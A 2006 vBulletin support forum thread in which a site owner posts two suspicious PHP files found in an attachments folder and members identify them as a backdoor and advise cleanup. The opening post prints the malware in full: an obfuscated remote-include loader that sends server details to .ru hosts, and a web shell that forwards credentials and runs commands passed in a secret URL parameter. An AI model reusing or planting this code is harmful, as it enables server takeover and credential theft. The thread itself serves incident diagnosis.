Announcement

Collapse
No announcement yet.

Is this a trojan or backdoor in my images/attachments folder?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Is this a trojan or backdoor in my images/attachments folder?

    During a recent server change, I found these suspicious .php files in my images/attachments folder.

    First file is called 'includes.php' and contains the following code:

    PHP Code:
    <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

    The second file is called configs.php and contains the following code:

    PHP Code:
    <?php
    error_reporting
    (0);
    if(isset(
    $_POST["l"]) and isset($_POST["p"])){
    if(isset(
    $_POST["input"])){$user_auth="&l="base64_encode($_POST["l"]) ."&p="base64_encode(md5($_POST["p"]));}
    else{
    $user_auth="&l="$_POST["l"] ."&p="$_POST["p"];}
    }else{
    $user_auth="";}
    if(!isset(
    $_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(
    base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u"ip2long(getenv(REMOTE_ADDR))) ."&url="base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth $log_flg))
    {
    if(isset(
    $_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if(
    $_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>

    I've also found this code in two files in each of the subdirectories of all of my photopost image folders as well.

    Can anyone shed some light on this?
    Last edited by Lt. Dan; Fri 3 Feb '06, 1:25am.

  • #2
    Firstly, I don't see an images/attachments folder... similar I know but images/attach yes, but not the one you mentioned.

    Also, I don't see those files in my images/attach folder.

    This doesn't necessarily mean that you have been hacked, as it may be related to storing the attachments in the database/filesystem, but I'd submit a support ticket for this and ask vB Staff to comment for you.
    John

    Comment


    • #3
      By default you won't have this folder. I moved my attachments out of the database and into this folder. The guy that found them told me that these files are phoning home to someone and that they open my server up to vulnerabilities. My question is, how did they get there? He says they appear to have been uploaded via http and not ftp... ???

      Comment


      • #4
        Submit a support ticket and get vB Staff to provide you with the correct information. If I were you, I'd close my board temporarily too.

        I would also rename those files... or move them to a secure area for subsequent investigation. It seems to me now that your board is vulnerable at the moment.
        John

        Comment


        • #5
          I have another board running on 3.5.3 and I've found that it too already has these php files embedded in all the attachement folders as well.

          Every attachment folder has a messages.php and a configs.php file in them with the same code.

          Comment


          • #6
            I didn't really analyze the scripts you posted, but it looks like someone gained access to your server and placed some unknown scripts there.

            You might want to check your server logs to see how they came there.

            I also suggest you ask your host for support on cleaning the server after a possible hack.
            Want to take your board beyond the standard vBulletin features?
            Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org

            Comment


            • #7
              Originally posted by MarcoH64
              I didn't really analyze the scripts you posted, but it looks like someone gained access to your server and placed some unknown scripts there.

              You might want to check your server logs to see how they came there.

              I also suggest you ask your host for support on cleaning the server after a possible hack.
              Its very odd that these same files appeared in a new directory on a different forum in the same locations.

              The guy that analyzed them for me send they were uploaded via http and not ftp, which he thought was odd.

              I also found a .htaccess file in each of the attachment directorys which appear to reference the suspect .php files.
              Last edited by Lt. Dan; Wed 15 Feb '06, 5:19am.

              Comment


              • #8
                What permissions do you have on these folders? I have avatars and attachments stored in the filesystem, and when I did the conversion, vB set up the directories for me. I went in now and noticed that permissions are 707 for both of these directories, meaning they are writeable. Had I known, I may have opted to keep these in the database.

                Didn't find these files mentioned above, but IMHO, it's only a matter of time before someone attempts it. I wish the conversion function in vB had warned me about this beforehand. (Or maybe it did, and I don't remember...?)

                The only cure I can think of is a cron job that would delete any files with the .php extension, since these contain only images. Or even setup my own PHP script to run via cron that would clear out anything that is not an image file. Not the best idea, but it might work for now...

                Originally posted by Lt. Dan
                I also found a .htaccess file in each of the attachment directorys which appear to reference the suspect .php files.
                Could you post the contents of that here (removing anything sensitive, of course)?
                Last edited by RedWingFan; Wed 15 Feb '06, 6:32am.

                Comment


                • #9
                  it looks like a backdoor shell uploaded by a script kid to your forum directories
                  delete those files at once, change all dbs passwords, change all users passwords
                  ask your hoster to change your FTP access pass
                  and I would recommand deleting all files from server and replacing them with new ones downloaded form vbulletin.com

                  btw.. this part

                  PHP Code:
                  ("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"
                  after decoding gives

                  you are pwned
                  Last edited by sensimilla; Wed 15 Feb '06, 6:39am.
                  StylWolny.pl - Polskie Forum Dyskusyjne | guziki wieszaki producent - Bonetti.pl
                  Join Tattoo Group Now

                  Comment


                  • #10
                    Originally posted by sensimilla
                    it looks like a backdoor shell uploaded by a script kid to your forum directories
                    delete those files at once, change all dbs passwords, change all users passwords
                    ask your hoster to change your FTP access pass
                    and I would recommand deleting all files from server and replacing them with new ones downloaded form vbulletin.com

                    btw.. this part

                    PHP Code:
                    ("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"
                    after decoding gives


                    you are pwned
                    That's what I was thinking myself. Nothing has happened on my server, so I'm guessing this was something automated. These files only show up in my VBB images/attachments folders and no place else.

                    I installed a second VBB to my server about a month ago and these files popped up in this one too.

                    The image/attachments folder is the default location that VBB looks to put attachments when you pull them out of the database, so perhaps its a script that looks to exploit those folders. VBB recommended CHMODD 777 when I created that folder, so that directory and all files are 777, which is probably how it was exploited.

                    The guy that found this on my server said that these scripts will allow the hacker to execut any function allowed on my server, but I've never had anything malicious happen on my server.

                    Comment


                    • #11
                      You don't always need to notice something if you are hacked. It could also be that your server is used for spamming or to do a DDOS attack.
                      Want to take your board beyond the standard vBulletin features?
                      Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org

                      Comment


                      • #12
                        Originally posted by MarcoH64
                        You don't always need to notice something if you are hacked. It could also be that your server is used for spamming or to do a DDOS attack.
                        Agreed, that is why I'm trying to find out what is going on. I've got the VBB guys looking at this as well. I dug through all of my files and haven't found this any place else.

                        I deleted all the suspicious PHP and .htaccess files and then uploaded my attachments into a directory with a different name to see if these files reappear.

                        The odd thing is that these files were uploaded via http, not ftp. How was this done?

                        Comment


                        • #13
                          Probably by a script somewhere on your server that you have not found yet.
                          Want to take your board beyond the standard vBulletin features?
                          Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org

                          Comment


                          • #14
                            Originally posted by MarcoH64
                            Probably by a script somewhere on your server that you have not found yet.
                            If that is the case, deleting everything in my public_html directory should get it, right?

                            Comment


                            • #15
                              Only if the hack is done on your account.

                              Is it a dedicated server, or shared hosting?

                              PS The script could be almost anywhere on your server, even embedded in a regular file/script.

                              There are some tools to help finding this kind of things like chrootkit, your host should know more about them. Unfortunatly, unless you can find exactly how the server was compromised and you can find all traces of it, the only secure way to get rid of things like this, i s acomplete new install (OS and everything) with clean files.
                              Want to take your board beyond the standard vBulletin features?
                              Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X